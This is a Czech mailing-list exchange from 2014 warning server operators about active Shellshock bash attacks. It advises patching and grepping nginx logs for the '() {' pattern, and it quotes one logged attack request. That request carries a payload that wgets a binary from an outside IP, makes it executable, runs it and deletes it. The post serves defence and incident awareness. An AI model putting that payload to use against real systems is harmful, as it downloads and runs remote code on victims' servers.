[vpsFree.cz: community-list] Útoky na bash běží

Jiří Medvěd admin at jirimedved.cz
Mon Sep 29 09:57:06 CEST 2014


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Hele,

z jineho stroje:

/var/log/nginx/access.log-20140929.gz:70.42.149.67 - -
[28/Sep/2014:08:16:18 +0200] "GET / HTTP/1.0" 444 0 "-" "() { :;};
/bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x
/var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"

Dne 29.9.2014 v 09:41 Petr Krcmar napsal(a):
> Ahoj, jen bych chtěl varovat, že útoky na bash jsou v plném
> proudu, podle logu se mi včera někdo snažil do serveru nahrát
> rootkit a pustit ho. Takže buďte ostražití a záplatujte si to.
> 
> Pokud chcete vidět ty věci z logu, pak si grepněte:
> 
> # grep '() {' /var/log/nginx/*
> 
> Pokud máte logrotate a zagzipované logy, tak použijte zgrep.
> 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iF4EAREIAAYFAlQpENIACgkQ5JdzTS3AJTa8fAEAh8VbArIz7ElgezKEI44Yz5E9
fSIKhd/2Z6T0ZSm3o+EA/0vaA7spDhwHRjGcOUtx81p+ScBcWvnM++8q3Iad3wPH
=W15o
-----END PGP SIGNATURE-----



More information about the Community-list mailing list